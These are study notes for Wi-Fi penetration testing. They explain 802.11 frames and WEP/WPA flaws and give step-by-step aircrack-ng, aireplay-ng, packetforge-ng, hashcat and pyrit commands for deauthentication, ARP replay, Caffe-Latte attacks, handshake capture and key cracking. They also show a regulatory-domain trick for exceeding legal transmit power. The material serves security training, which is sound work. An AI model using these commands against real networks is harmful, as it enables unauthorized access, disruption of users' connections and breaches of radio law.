Pre-Requisites

Study Guide

Software

  • Kali
  • AirCrack-NG
  • Compability information about specific adapters

Hardware

  • notebook with WNIC (Wireless Network Interface Controller)
  • A better option is to buy an external USB Wi-Fi dongle
  • This is especially true if u plan to perform your attacks from a VM.
  • When looking For a new Wi-Fi adapter, u have to pay attention to:

→ Signal Power

→ Receiver sensitivity

→ Linux Driver support

Some wireless adapters: Alfa AWUS036H

In case u wanna attack different protocols, get a dual-band adapter

Antennas

  • Two types:

→ Omnidirectional

  • wider area, pick up signals in 360 graus
  • range goes from 2dBi to 9 dBi
  • rubber ducky

→ Directional

  • range goes to 12dBi
  • Cantennas
  • WokFi
  • Yagi-Uda = reach gains over 20dBi

Note on signal strength

dBm mW
0 1
10 10
15 31
20 100
27 500
30 1000

The majority of wireless adapter drivers are based on the mac80211 framework:

lsmod | grep 80211

Adapter config

Config:

iwconfig
iw list

Change channel:

iwconfig wlan0 channel 11
iw dev wlan0 set channel 11

Maximum transmission depends on the country = regdomain

A trick that is often used to increase maximum transmit power of a wireless adapter consists in setting the country code to match Bolivia:

iw reg set BO
iw dev wlan0 set txpower fixed 30dbm
iwconfig wlan0

Monitor mode

airmon-ng start wlan0
iwconfig mon0
airmon-ng stop mon0
airmon-ng check kill

kill programs that are blocking our wireless interface or changing its parameters

Testing your setup

Start the monitor interface and set the card to the desired channel first

aireplay-ng -9 mon0

-9 = test mode

Standards and Networks

IEEE 802.11 Standards

Types of Wireless Network

Wireless frames

Security Features

Wi-Fi Standards and Networks

802.11 Standards

  • IEEE=Institute of Electrical and Electronics Engineers
  • Its a worldwide association counting over 425,000 members dedicated to advancing technological innovation.
  • IEEE 802.11 is related to Wi-Fi technologies

  • The 2.4GHz band is divided into 14 overlapping channels with a 22MHz bandwidth around the central frequency.
  • The 5.0GHz is less crowded and guarantees a higher number of non-overlapping channels.

Type of Wireless Networks

Two main types:

Infrastructure Network Ad-hoc Network

Infrastrucutre Network

  • A Basic Service Set (BSS) contains an Access Point (AP) and a set of wireless client stations (STAs).
  • Every BSS has a unique formal identifier called BSSID (the MAc address of the AP)
  • BSS also called SSID (Service Set Identifier)
  • Extended Service Set (ESS) - In this config multiple BSS exist with a common SSID (now called ESSID) nut unique BSSID.
  • The Access Points are linked together using a backbone Distribution System (DS) which is usually a wired Ethernet network, This enables communications between STAs associated in different BSSs and other segments of the network.

Ad-hoc Network

  • This type of network does not need an existing infrastrucure. All of the STAs directly communicate to each other, as there is not a central base. A set of station connected like this is called IBSS (Independent Basic Service Set)

Wireless Frames

  • In the context of the 802.11 specifications, datagrams are called frames.

Each frame consists of:

→ An header
→ An optional payload (data)
→ A Frame Check Sequence (FCS)
  • The Frame Control field contains control information defining the type of 802.11 MAC frame and how to process the frame itself.
  • The frame function is defined by the Type and Subtype fields.

Currently the standard describes three types of frames:

→ Management Frames
→ Control Frames
→ Data Frames
  • The frames ‘To DS’ and ‘From DS’ indicate whether the frame is going to or exiting from the DS (distributed system)
  • THe WEP field (aka Privacy Bit) is a boolean flag and indicates whether or not the WEP algorithm has been used to encrypt the packet. We will discuss WEP and other security features of 802.11 in the next session.

Addresses can be a combination of the following:

→ BSSID: identifies an AP
→ Destination Address (DA): final destination to receive the frame
→ Source Address (SA): original source that created the frame
→ Receiver Address (RA): receiving STA
→ Transmitter Address (TA): transmitting STA
  • Frame Body is an option field (from 0 to 2312 bytes) that contains the payload of the transmission.
  • The Frame Check Sequence (a simple Cyclic Redundancy Check (CRC) of the entire frame), is used For transmission error detection.

Beacon

  • Beacon frames are periodically transmitted by an AP. Their purpose is to advertise the availability of a wireless network. They contain information about network parameters and AP capabilities such as supported throughput rates.
  • beacons also contain the SSID but that value can be stripped from the frame For security reasons. (Hidden SSID)

Probe Requests

  • Are sent by a wireless client in order to determine the network availability status. It contains the SSID name of the network and is sent over all the wireless channels. A special “null” (0x00) SSID can be used if the client does not want to search For a specific network.

Proble Responses

  • Are sent by an AP upon the reception of a Probe Request.
  • They are very similar to beacons but they can also contain additional information (as specified by the communicating client inside the correponsing Proble Request Frame)

Authentication Frames

  • Are used to perform the authentication process.
  • Unlike association or probing, all authentication frames share the same subtype.

  • After the authentication, a station needs to associate to an AP. This is the purpose of the Association Request Frames. These Frames carry information about the STA capabilities (e.g. supported data rate) and the SSID of the network to which it wishes to associate
  • After receiving the association request, the AP considers associating with the STA, and (if positive) establishes an Association ID (AID) For the newly associated STA reserving necessary memory resources.

Association Response Frame

  • Contains an acceptance or rejection notice to the requesting STA. If the AP accepts the STA, the frame includes information regarding the association such as Association ID and supported data rates.
  • The wireless STA can now start to communicate with other peers in the network through the AP.
  • A station sends a DIsassociation Frame to another station if it wishes to termimate the association but the same frame can be used by either party of the communication.
  • Disassociation is often used when the station is roaming from a BSS to another in order to keep the authentication status.
  • The frame also contains a reason code field.

Deauthentication Frames

  • Used when all of the communication is terminated. Example, a STA that is shut down gracefully can send a deauthentication frame to alert the access point that its powering off. The AP can then free memory allocations and remove corresponding records in its internal structures.

Security Features

We will explore 2 main aspects:

→ Traffic encryption
→ Station authentication

Encryption

Wired Equivalent Privacy (WEP)

  • Due to number of flaws it has been deprecated in subsequent versions of the standard.
  • WEP uses the RC4 algorithm For encryption with a 40 (WEP-40) or 104 bits (WEP-104) long key.
  • RC4 is a stream cipher that uses a pseudo-random generation algorithm (also called PRGA) coupled with an internal state and a key to generate a byte keystream.
  • This keystream is then XORed to the plaintext to obtain the final encrypted cyphertext
  • In WEP implementation, the RC4 internal state is reset on every frame.
  • the PRGA algorithm is deterministic and would procuce the same results over and over if the same key is applied.
  • To alleviate this problem, the RC4 implementation designed For WEP makes use of a 24 bits Initialization Vector (IV) as a concatenated prefix of the key.
  • Key index is a number from 0 to 3 that stands as a key identifier. This mechanism was introduced to facilitate key changes in large organizations.
  • Integrity Check Value (ICV) - This is a 4-byte CRC code of the original unencrypted frame.
  • The purpose is to detect frame tampering by an attacker.

WEP Flaws

  • The first flaw comes from the short length of the IVs.
  • As this is only 24 bits, there is a 50% probability that the same IV will be repeated after only 5000 packets.
  • In a semi-busy network, the packet rate is large enough to assure repetitions will happen quite often.

Keystream reuse is a critical vulnerabilty

  • If the attacker can get two cyphertexts that were encrypted with the same keystream and has knowledge about one of the two plaintexts, he can recover the other messages with a simple operation.
  • Its also possible to abuse this vuln For the inverse task of recovering the keystream.
  • An attacker that has obtained an encrypted frame should not be able to modify that frame and re-inject it into the network successfully.

  • WEP uses CRC-32 to calculate a checksum (the ICV) of the payload before the encryption. The ICV is then sent encrypted along with the message.
  • This leads to another WEP flaw: its actually possible to make controlled changes to the frame payload and re-inject it without the receiver noticing.

FMS attack

  • relies on a subset of the possible IVs, named “weark IVs”. While the other IVs are simply discarded during the attack, these weak IVs can ‘leak’ portions of the key; statistical attacks can be performed in order to fully recover the network key.
  • Implementations of the attack are avaiable in the aireplay-ng tool.
  • mr Klein 2005 discovered more correlations between the key and the RC4 generated keystream
  • moreover: RC4 KeyStream
  • mr Pychkine, Tews, Weinmann, were able to optimize Kleins attack and apply it to the WEP scenario resulting in a powerful new methodology (named PTW)
  • moreover: EPrint.IACR.ORG
  • The PTW was able to recover a 104-bit WEP key with 50% probability using onl 40k captured packets.

WPA (Wi-Fi Protected Access)

  • The main addition was the use of a per-packet 128 bit key, generated using the Temporal Key Integrity Protocol (TKIP) - a feature that prevents the types of attacks that compromised WEP.
  • This means that For each packet, a new key is dynamically generated.
  • Another feature of WPA is the addition of a message integrity check (MIC)
  • This is designed to prevent an attacker from capturing, altering and/or resending data packets; this replaces the Cyclic Redundancy check (CRC) used by WEP that could not provide any security guarantee.

WPA2

  • The new standard deprecates the use of TKIP in favor of CCMP, a new AES-based encryption scheme with strong security properties.
  • TKIP was still based on the RC4 cypher. Researchers were able to demonstrate attacks on WPA when TKIP encryption was in use by exploiting some of the known flaws existing in RC4.
  • Since TKIP is not completely secure and has been deprecated, to guarantee the best security of a Wi-Fi network, WPA2 with CCMP/AES encryption must be used.

Authentication

  • In order to exchange messages, client stations must be associated with an AP. Before this can happen, stations need to authenticate themselves, proving they have the rights to access the wireless network.

  • 802.11 specifications describes three possible connections states For a client that model this process:

Not authenticated
 → Authenticated but not associated
 → Authenticated and associated

The 802.11 original standard specified two different stations authentication modes:
 → Open Authentication
 → Shared Key Authentication (SKA)

Open System

  • If Open authentication is enabled on the AP, the client station simply sends an Authentication Request Frame, specifying the target SSID, and receives an Authentication Response with a successful result.
  • The information is broadcasted by the AP in beacon frames, so it cannot be considered a secret.
STA > Open System Authentication Request > AP
STA < Open System Authentication Response < AP
STA > Association Request > AP
STA < Association Response < AP

When one of the steps goes wrong:

Transmission errors
Stations incompatibilities
MAC filtering 

The AP will report a failure status code in its Authentication Response.

  • Useful to note, the messages exchanged during the process are sent unencrypted. WEP encryption is used only For Data Frames sent immediately after a successful authentication.

Shared Key Authentication

  • SKA is available only when WEP is enabled. Different from the Open mode, when receiving an Authentication Request, the AP responds with a challenge text (128 bytes). The client needs to encrypt the challenge with the shared WEP key and return it to the AP in the next frame. Then the AP compares the decrypted challenge to the known plaintext and successfully authenticates the client if they are equal.

Schema:

STA > Authentication Request > AP
STA < Challenge Text < AP
STA > Encrypted Challenge > AP
STA < Authentication Response < AP
  • An attacker will be able to authenticate to the AP once he has snooped over at least one authentication message flow.
  • This clearly makes the Shared Key Authentication completely broken so you should not rely on it For any security requirements.

Discovery

Tools

Hidden SSID

Tools

Traffic Sniffer

For Linux:

Kismet, airodump-ng

For Windows:

InSSIDer Office

For Mac:

KisMAC

InSSIDer

InSSIDer

Services:

 → SSID
 → Signal Strength
 → Channels
 → Encryption Level (WEP/WPA/WPA2)
 → AP MAC address
 → Wi-Fi protocol

Kismet

Kismet Wireless

  • Client/Server architecture. The server provides data while the client application uses them to display information gathered from one or more server. This architecture is further extensible with another subject: drones.
  • These drones are simple wireless devices that only scan the air and feed captured frames to a specified server.
  • Firstly put your wireless adapter into monitor mode, as usual.

The simplest way to start sniffing with Kismet and your monitoring interface is through this command:

kismet -c <mon_interface>

Colors define the type of encryption:

green = N (None)
red = W (WEP)
yellow = O (Other, typically WPA or WPA2)

Airodump-ng

AirCrack-NG

Can:

 → Perform automatic channel switching
 → Filter captured traffic by BSSID or cypher suite
 → Determine the list of clients associated to a network and their MAC addresses  
 → Provide information on signal leve, network traffic, security settings

Syntax:

airodump-ng <interface>
airodump-ng -c 1,6,11 mon0 // will only scan these 3 channels 1, 6 and 11
airodump-ng -w <filename> <interface> // -w = to save the results of your capture session
airodump-ng -c <channel> -b <BSSID> mon0
airodump-ng -t wep mon0 // only filter the WEP encrypted networks [wep, opn, wpa, etc]

Hidden SSID

  • Almost all APs have an option to cloak the SSID value they broadcast in all the beacon frames. When this option is set, the AP will simply replace the original SSID value with a null value.
  • While this can be a simple measure to stop a newbie from seing the network, it does not deliver strong protection.
  • In fact, the tools we have showcased in the previous section are able to discover these so-called hidden networks.

  • Passive de-cloaking attacks work by sniffing frames transmitted over the network. Many Wi-Fi frames transmitted by both the AP and the STAs will contain an SSID field in plain-text as we have already learned.

Some examples:

 → Probe requests
 → Probe responses
 → Association requests
 → Re-Association requests

Open Wireshark and start sniffing on your monitor interface:

wlan[0] == 0x80 // to filter only beacon frames
  • Now try to config your AP to cloak its SSID value. You will probably find an option with a name like Broadcast SSID or similar. IF you disable SSID broadcast, the network name will be stripped from any new beacon frame.
  • While a passive attack should work most of the time, there is a slight chance that if the network traffic is very low, an active attack may be necessary.

Network De-Cloaking

  • Active attacks involve sending DEAUTHENTICATE message For an active station to the station AP. This will force the STA to rejoin the network in order to communicate with the original AP. Since the network is hidden to the STA too, it will have to cycle through all the channels sending Probe Request Frames, allowing us to intercept the Probe Reponses Containing the target SSID field.

Set up a scenario about hidden SSID de-cloaking:

 → Configure your AP to hide the SSID value
 → Associate a victim client to the network
 → Configure your monitoring interface and start sniffing through it with Kismet as previously shown

Upon execution, Kismet will list your network showing a placeholder value in the SSID column:

like that <Hidden SSID>

Locking our wireless adapter to the target network channel:

Kismet menu > selecting Configure Channel > Click Lock in the next Windows and write a proper channel into the input field
  • Now you need to get the list of STAs associated to the target hidden network as you will next try to deauthenticate one; write down your victim client MAC address

Apply deauthentication:

aireplay-ng -0 <num> -c <target mac> -a <BSSID> <intf>

-0 num = deauth attack + times or use 0 For infinite loop BSSID = target BSSID, the AP MAC address intf = your monitoring interface

  • In the Kismet window, you should now see the correctly determined network SSID.

In wireshark you can filter out uninteresting frames:

wlan.fc.type_subtype == 0x05

Probe response frame sent by the deauthenticated client right after the attack

  • In small office environment a simple deauthentication attack can reveal the SSID in seconds
  • In bigger environments a passive scanning will suffice as Probe Requests/Reponses will be much more frequent.

Traffic Analysis

Capturing traffic

Monitor mode

Channel hopping

Wireshark filters

Traffic decryption

Capturing Traffic

to see the config of your adapter:

iwconfig
  • Processes are not provided with the raw packets data. Instead, the wireless stack deliver the packets as normal Ethernet frames.
  • If your wireless adapter is not associated to any Wi-Fi network, you will not be able to sense any data
  • Another limitation of this approach is that you will only see packets directed to your station; you will not be able to sniff traffic from other wireless clients.
  • This kind of behavior can be useful if you want to debug high level protocols.

Monitor Mode

  • The equivalent of the promiscuous mode is called monitor mode. An interface configured to work in monitor mode will expose 802.11 frames to higher level protocols and will also accept frames directed to other STAs,
  • Not all operating systems or drivers natively support monitor mode.

Put your interface into monitor mode:

airmon-ng start <interface>

The command will create a new virtual WiFI interface. The new interface name will probable be mon0 but this may vary depending on the drivers you are using.

iwconfig
  • the new interface must appear

Channel Hopping

  • Even if you can sniff all of the packets being transmitted over the wireless medium, you are still restricted to one channel at a time.
  • This is due to how wireless adapters internally de-modulate the received electromagnetic waves and can not be changed.
  • Channel hopping refers to the technique of constantly switching the channel on which the wireless adapter operates.
  • This technique is mostly useful For recon purposes than to really capture data, because while locked to a specific channel, the wireless adapter still can not receive frames sent on any others.

Tools For channel hopping: airodump-ng

airodump-ng -w <outputfile> <interface>
  • this will create a file name outputfile.cap that you could open with Wireshark For frames dissection.
  • If you have a supported card, you could also hop on more than one wireless band using the –band option and specifying a combination of a, b and g letters.

a = 5GHz, b and g = 2.4GHz

Wireshark Filters

wlan.fc.type_subtype != 0x08
# 0x08 = beacons, so the filter will get all the frames except beacons.

wlan.fc.type == 0x02
# to filter by frame type

Some more filters that may be useful

→ moreover: http://www.wireshark.org/docs/dfref/w/wlan.html

Filters by AP MAC address:

wlan.bssid

Shows Management Frames related to a SSID:

wlan_mgm.ssid

All frames from or to a specific MAC:

wlan.addr

Search frame with specific Destination Address:

wlan.da

Search frame with specific Source Address:

wlan.sa

WEP encrypted frames:

wlan.fc.wep

Traffic Decryption

> Wireshark 
> Edit 
> Preferences 
> IEEE 802.11 (from the left menu under Protocols section)
  • Enable decryption

Decryption Keys: click in Edit > new > Example:

wep/<wep_key_in_hex> 
wpa-pwd/<passphrase_as_plain_ASCII_string>:<SSID>
  • WPA uses a per-session key generated by two communicating stations, you must collect the 4-way handshake between those two stations For wireshark to be able to correctly calculate the key and decrypt the conversation data. To ensure you captured the handshake, apply a filter using eapol

Another tool to decrypt packets WEP, WPA, WPA2 is airdecap-ng

WEP decrypt:

airdecap-ng -w <wep_key_in_hex> <.cap>

you do not need to specify the output file. Airdecap will automatically append the -dec suffix to the input filename and create a new file. Upon execution, you will be shown a report of decrypted packets.

WPA decrypt:

airdecap-ng -p <wpa_passphrase> -e <SSID> <.cap>
  • The main difference is that you also need to specify the network SSID.
  • You should use plain ASCII characters to specify the passphrase.
  • Now you can open the produced -dec file with Wireshark.
  • if you wanna keep the headers information, add the -l flag when running the command.

Module Map

WEP

WPA and WPA2

WPS

Wired Equivalent Privacy (WEP)

  • Given the low security level provided by the WEP encryption scheme, less and less networks are configured to use it.

The main flaws of WEP encryption:

Weak authentication scheme
Short initialization vector (IV) and subsequent frequent reuse
Vulnerable to replay attacks
Weak frame intregrity protection
Low resistance to related key attacks enabling efficient statistical attacks

Setup:

Set your AP to use WEP encryotion
Set the WEP key size to 40 bit and choose your key (10 hexadecimal characters)
Associate a device to the network. It should not be the same device you will use For the attack

Attacker machine Put your wireless interface into monitor mode:

airmon-ng start <interface>

Sniff the network traffic:

airodump-ng -c <channel> -w wep_attack <interface>

Two columns:

**#Data** and **#/s**
you want high values For these columns in order to succeed.
Data = number of data frames collected
**#/s** = data frames capture rate as frames per second

Deauthentication Attack

  • When deauthenticated from a wireless network, normally a client will just try to re-authenticate shortly later.
  • There is a management frame For this purpose; this is sent completely unencrypted and requires no authentication from the sender.
aireplay-ng -0 10 -c <client_mac> -a <bssid> <intf>
  • This will increase the data frames we gather. (#Data column)
  • Deauthentication attacks force the victim to actually disconnect from the network. If you abuse this technique, chances are that your attack will be notice! So keep this in mind when pentesting a real-world wireless network.

ARP Replay Attack

  • A very famous technique to generate a lot of useful traffic on a wireless network is the ARP replay attack
  • Given that the traffic is encrypted, how can the attacker actually identify an ARP request?

luckily, ARP requests have a fixed payload size (36 bytes) so they can be easily identified. They always have a broadcast destination address (FF:FF:FF:FF:FF:FF) that is transmitted in plain text in the frame header.

  • Steps:
  1. Associate with the AP
    aireplay-ng -1 15 -a <bssid> -e <ssid> <intf>
    
    • This will associate your adapter to the specified network. You have to provide both BSSID and SSID. The -1 stands For fake authentication while the number on the right is the delay between authentication attempts.

If you receives deauthentication messages from the victim AP constantly. You can try this variation:

aireplay-ng -1 6000 -q 10 -o 1 -a <bssid> -e <ssid> <intf>

-q 10 = enable keep-alive packets every 10 seconds to maintain the authentication status -o 1 = forces aireplay to send one set of packets at a time. do not close the windows, the aireplay must be running while performing the attack

  1. Listen to ARP requests
    aireplay-ng -3 -b <bssid> <intf>
    

The aireplay is saving ARP requests to a file. The next time you will not need to wait again For ARP requests.

  1. Capture the ARP request
    • you can generate one by pinging a nonexistent IP from your victim client.
  2. Almost instantly aireplay will start to re-inject the captured ARP request
    • Sent packets goes up really quickly
  3. Airodump will show the increase in received data frames as you are flooding the AP
    • ’#/s’ will be bumped

Cracking the Key with AirCrack-ng

  • Aircrack-ng is a software that encapsulates a series of cracking techniques For both WEP and WPA network keys.
  • The command needs data packets in order to crack the WEP key. The minimum amount of packets depend on the key length. 40 bit keys will require about 5000 IVs to be cracked, while 104 bits key could require a number ten times higher or more.
aircrack-ng -n <key_length> <.cap file>

As you do not know the key length at the time of the attack, a good strategy is first trying with 64 bits. if that fails For more than 10.000 IVs, try again with a key size of 127 bits.

Other useful options of aircrack-ng:

-a <mode> = use 1 For WEP, 2 For WPA
-e <SSID> = target network SSID
-b <BSSID> = target APs MAC address
-c = search only alpha-numeric characters
-t = search only binary coded decimal characters
-w <wordlist> = provide path to wordlists For dictionary attack
  1. Try to run aircrack on our captured packets.
    aircrack-ng -e <SSID> wepattack1*.cap
    

the cracking process wil begin, If the IVs number is not sufficient, aircrack will just wait For airodump to get more so you do not need to restart the command.

This technique requires only ARP request/responses in order to work as they are used to improve the speed of the cracking process.

  • So the usual network traffic will not be useful and you will need to launch an active attack with the ARP generation techniques we discussed earlier.

if you have collected enough IVs, aircrack should now report the recovered key as follows KEY FOUND! [ 00:11:22:33:44:55 ] - key was found and displayed as hexadecimal bytes notation

Korek Attack

  • PTW is the fastest and default technique used by aircrack but it requires ARP. As a fallback, you can still use the old pre-PTW technique that uses a combination of KoreK statistical methods
  • you can switch to KoreK attacks by using the -K flag when you launch aircrack-ng.

Clientless WEP cracking

  • We always assumed the presence of a wireless client associated to the AP. This is a frequent scenario but in the real world, it may sometimes be completely unused.
  • First, assure yourself there are no clients associated. If this is the case, your airodump output should list zero clients
  • We now use the aireplay fragmentation attack option to get a PRGA (Pseudo Random Generation Algorithm) stream

  • Steps:
  1. Authenticate to the AP
    aireplay-ng -1 6000 -q 10 -a <BSSID> <interface>
    
  2. Start aireplay fragmentation attack
    aireplay-ng -5  -b <BSSID> -c <source_mac> <interface>
    

    -5 = indicates the fragmentation attack source_mac = your wireless adapter MAC

At some point, if you are lucky, you will get a data packet transmitted from the AP. These are distinguishable by the FromDS bit set to 1.

the aireplay-ng saves the obtained keystream to a file so now we can forge packets with it.

Troubleshooting

  • Fragmentation attack can sometimes fail. If you are not able to obtain a keystream, please be sure you are associated to the network and close enough to reach the AP with your wireless signal.
  • not enouch acks, repeating:
  • When getting this message from aireplay output, the aircrack documentation suggests to move closer or further away from the AP.
  1. With the capture PRGA we now build an ARP request packet using this command:
    packetforge-ng -0 -a <BSSID> -h <source_mac> -k <ip1> -l <ip2> -y <prga.xor> -w <outfile>
    
  • This command creates the packet and saves it to the specified output file
  • The -0 flag tells packetforge that we want to build an ARP request looking For the MAC address of ip1. Ip2 is the IP address that is starting the request. As usual, we set the BSSID of the target network and use our wireless adapter MAC address as the source.
  • We used 255.255.255.255 as the value For both -k and -l. Many APs just ignore the IP address used in the ARP so using this value will be fine most of the time.

  • We will start injecting packets thus generating new IVs so start up airodump to save them.

To inject the forged ARP request:

aireplay-ng -2 -r <packet-file> <interface>
  • the packet generated in the previous step
  • The AP should start replaying the inject packets.

means that the #Data should increase

  • As we now have a way to generate new traffic, we can proceed through the usual attack process
  • We will gather IVs and run aircrack as we previously seen.

Bypassing Shared Key Authentication

  • The attacks we have mounted thus far are targeted to WEP networks using Open Authentication
  • But there is WEP with SKA (Shared Key Authentication)

Review the steps involved in this attack:

1. Deauthenticate one victim client
2. Obtain keystream from captured authentication frames
3. Authenticate with the AP using recovered keystream
4. Initiate ARP replay attack

Steps to attack

  1. Deauthentication
    airodump-ng -c <channel> -w shared <interface>
    

in another terminal

aireplay-ng -0 0 -e <SSID> -c <client MAC> <interface>
  1. Obtain the keystream
    • Watch your airodump terminal window; On the top part, you should see a message which informs you a keystream was recovered.

The recovered keystream will be save in a .xor file located in the airodump working directory.

  1. Authenticate with the AP
    • We can try to authenticate ourselves with the target AP

We will launch aireplay fake authentication attack but this time, we will provide the command with the needed keystream

aireplay-ng -1 6000 -1 10 -e <SSID> -y <file.xor> <interface>
  1. Initiate ARP replay attack
    • The attack is now almost complete. You just need to perform ARP replay as we learned in the previous section.

Attacking the Client

  • This new attack permits WEP cracking off-site. This is possible because these attacks target the wireless clients instead of the network infrastructure. Caffe-Latte Attack

Caffe-Latte Overview

  • The main target of the attack is the roaming client. As we have learned in our theoretic presentation of Wi-Fi principles, an unassociated client periodically sends out Probe Requests on every channel, searching For the wireless networks its configured to use.
  • Probe Requests only search For a particular SSID so that the AP MAC address can change without affecting the clients.
  • Most wireless clients, upon association to a network, will send out a few gratuitous ARP and DHCP requests. These packets are encrypted! A basic form of the attack could now deauthenticate the client and restart the process over and over until a sufficient amount of IVs has been gathered. Unfortunately, this could take a huge amount of time and would be not practical as we are targeting a roaming client and we have only a few minutes.
  • In fact, its possible to flip bits in the packet payload and then adjust the corresponding ICV (Integrity Check Value), a CRC-32 field calculated on the encrypted data, obtaining a perfectly valid packet.
  • Once an gratuitous ARP packet is received, its possible to flip certain bytes and forge a new ARP request targeting the client (see the paper For details). Its now possible to flood the client with these ARP requests and collect a huge amount of encrypted packets in a few minutes.

Caffe-Latte Attack

This lab will assume the following:

Your target network AP is switched off or out of reach
A client with a pre-configured WEP key For the target network is in range and unassociated to any wireless network
You have another device that you will use as your attack point
  • If we start airodump, we can see our client is sending Probe Requests searching For pre-configured networks.

This is the command used:

airodump-ng -w <outfile> <interface>

Advice

  • As Probe Requests will be sent out on all channels, a good tip is to fix the channel in airodump using the -c option.
  • For example, you could fix your capture on the first channel.
airbase-ng -c <channel> -W 1 -L -e <SSID> <interface>
  • airbase is a tool that transform your wireless adapter into a Wi-Fi access point For a series of purposes.
  • -L = enable the Caffe-Latte attack
  • -e = sets airbase to act as an AP For the specified SSID.
  • -c = fixed the wireless channel
  • -W 1 = force airbase to not set the WEP Privacy Bit in beacons.
  • When launched it will associate the victim to our fake AP and airbase will automatically start the Caffe-Latte attack
  • in the airodump window, the data packets rate should start to increase as you collect the IVs

Now we wait to gather a sufficient amount of encrypted packets.

In the mean time, we can start aircrack and feed it with the capture file from airodump. After 15.000 IVs, we got the Key!

  • There is a variation of this attack Hirte Attack (using -H switch).

Uses the same tatics plus fragmentation to achieve an higher speed as the same ARP request can be split into multiple shorter encrypted frames.

WPA and WPA2

The Four-Way Handshake

  • When a new client wants to join a WPA/WPA2 protected network, it must first authenticate itself, proving it owns the shared key.

Step by Step

  1. The shared passphrase is used to generate the PMK (Pairwire Master Key). This key is 256 bits long. Both the STA and AP independently calculate this value combining the PSK and SSID name.
    STA > calculates PMK
    AP   > calculates PMK
    
  2. The AP sends the STA a message containing a nonce, a secure cryptographic random number. In the WPA specification, this number is called ANonce (as Authenticator Nonce)
    AP > sends ANonce > STA
    
  3. STA generates another nonce, called SNonce (Supplicant Nonce), and builds the PTK concatenating the PMK, both nonces, the MAC addresses of AP and STA and processing this product through a cyptographic hash function called PBKDF2-SHA1
    STA builds the PTK
    
  4. STA then sends its SNonce to the AP that can now build the PTK. As it uses the same information, both PTKs will be the same without the original PSK ever being transmitted over the air. This third message also contains a MIC (Message Integrity Code) which is used to authenticate the sending STA.
    SNonce + MIC > AP builds the PTK
    
  5. The AP replies back with a message containing the GTK (Group Temporal Key) used to decrypt multicast and broadcast traffic. This message is also authenticated by means of MIC. An acknowledgment concludes the process.
    AP > replies GTK + MIC
    STA > sends ack to conclude the process > AP
    

Capture the Handshake

Launch airodump and start sniffing on the correct channel:

airodump-ng -w <outfile> -c <channel> <interface>

ps: If we wanted to perform a totally passive attack, we could have waited For a new client to join the network but this could require a lot of time.

Write down the client MAC address and launch the deauth attack against it:

aireplay-ng -0 1 -a <BSSID> -c <client_mac> <interface>

If the victim STA is inside the reachable area of your wireless card, it will be forced to rejoin the network and you should be able to get a new 4-way handshake After getting the handshake its time to crack it.

Using Aircrack against the Handshake

  • Dictionary attack (also available For WEP)
  • Pure brute force attack

Launch aircrack-ng:

aircrack-ng -w <wordlist> <.cap file>

the cap file is the captured handshake of the previous step.

Building a Wordlist with Crunch

Crunch Wordlist

  • A tools that can help you extend your basic wordlist with all kinds of transformations (or even build a wordlist from scratch following your criteria) is Crunch

Syntax:

crunch <min_length> <max_length>

crunch will generate all of the possible combination of words between the two length values. By default, only lowercase letters are used.

Hint: Start with a minimum length of 8 as routers and APs require a passphrase at least that long. Crunch will output the words to the console by default. Let us save them to file.

crunch 8 8 -o my_words.lst
  • it will save on the my_words file
  • Keep in mind that this particular command will generate almost 1.8TB of data and requires some time too. So leave your machine crunching!

Tip: You can manipulate your wordlist using commands: sed, tr, rev, uniq, seq!, etc

crunch 8 8 | aircrack-ng -e LabNetwork file.cap -w -
  • -w - = tells aircrack to read words from the standard input. This avoids saving the huge amount of data but it slightly increases the overhead.

Tip: If you want to compare your computing power, you can run:

aircrack-ng -S
  • This command will benchmark your WPA key crunching power and output the estimated k/s value.

Exploit the GPU power

  • The latest video card generations added the ability to use the raw power of the modern GPUs For general purposes.

Many tools were developed to exploit these capabilities For password bruteforcing:

oclHashcat
Pyrit
John the Ripper

OclHashCat

Ocl HashCat

  • Make sure your GPU is supported
  • To be able to discover the handshake key, you need to transform the .cap file to a format understandable by the program.
  • The tool in fact needs an .hccap (HashCat capture) files.

To convert you can use: → Cap to hccap

  • You have to upload the .cap file, specify the network SSID and then download the converted file.
  • You can also convert using aircrack with the -J option

Launch the cracking:

olcHashCat -m 2500 <.hccap file> <wordlist file>
  • -m 2500 = tells the tool to crack a WPA/WPA2 handshake

oclhashcat = its compatible with AMD/ATI GPUs cudahashcat = its compatible with nVidia

  • We cracked the handshake 5x faster with the GPU option.

Cracking as a Service

  • If you do not have a powerful GPU or you do not want to stress your hardware calculating hashes is another possibility. The cloud!

online hash crack

  • WPA cloud cracking service:

Online Hash Crack

  • These services only require you to upload the .cap file containing the 4-way handshake and specify the target SSID.
  • The most powerful services need you to pay a small fee. But For under $20, you can greatly increase the success chances of the attack.

CloudCracker

  • This service uses a 600 millions words dictionary and will give you a response in 20 minutes.

Space-time tradeoff

  • Alternative bruteforce method, use time-space tradeoff to pre-calculate large amount of hashes and store them in rainbow tables.
  • it has one important flaw: its slow!
  • The algorithm used to calculate the PMK, called PBKDF2 requires running 4096 iterations of the HMAC algorithm that is actually designed to be computationlly expensive.
  • One way to speed up this process is to pre-calculate the PMK For all of the various passphrases in your wordlist.
  • The calculation of the PMK does not only depend on the used PSK but it also depends on the network SSID value!
  • How you can create PMK databases? next session

Pyrit

Pyrit

Check the database status:

pyrit eval

Import some passwords from our wordlist:

pyrit -i <wordlist_file> import_passwords
pyrit eval // now it will detect the imported passwords and remove all the unusable ones.

Now to generate the PMKs, we must provide pyrit with at least one SSID:

pyrit -e <SSID> create_essid

Launch the batch command:

pyrit batch

At this point, pyrit will start buliding your database For the included SSIDs and password combinations. Database generation could be a very long process, depending on the power of your CPU.

Launch the attack against the handshake:

pyrit -r <.cap file> attack_db

pyrit will try all of the different PMKs in its database very quickly and will eventually output the found key if it was initially in your wordlist. Almost 10 times faster than aircrack

Pre-built hash files

  • You can find pre-built PMKs databases For the most common SSID names.
  • Church of WiFi = http://www.renderlab.net/projects/WPA-tables/
172k words x 1000 SSIDs, 7GB
1mi words x 1000  SSIDs, 33GB
  • If you are lucky you could also find spliced portions of these databases, related to a single SSID, by searching the web with Google or asking in network security forums.

Search:

"<SSID> rainbow table" or "<SSID> PMK database"

Wireless Protected Setup (WPS)

Setup alternative methods:

Push-Button-Connect
Internal-Registrar
External-Registrar

WPS PIN number:

1st half of PIN / 2nd half of PIN
// its divided into two halves of 4 digits each. THe last digit of the second half is a checksum meaning its always calculated from the other digits

Authentication process:

1. both AP and client initialize encryption keys and internal state
2. client proves possession of 1st half of the PIN
3. client proves possesion of 2nd half of the PIN
4. AP sends network security configuration
  • At every step, if the client is sending wrong data the AP terminates the process and sends an ACK packet
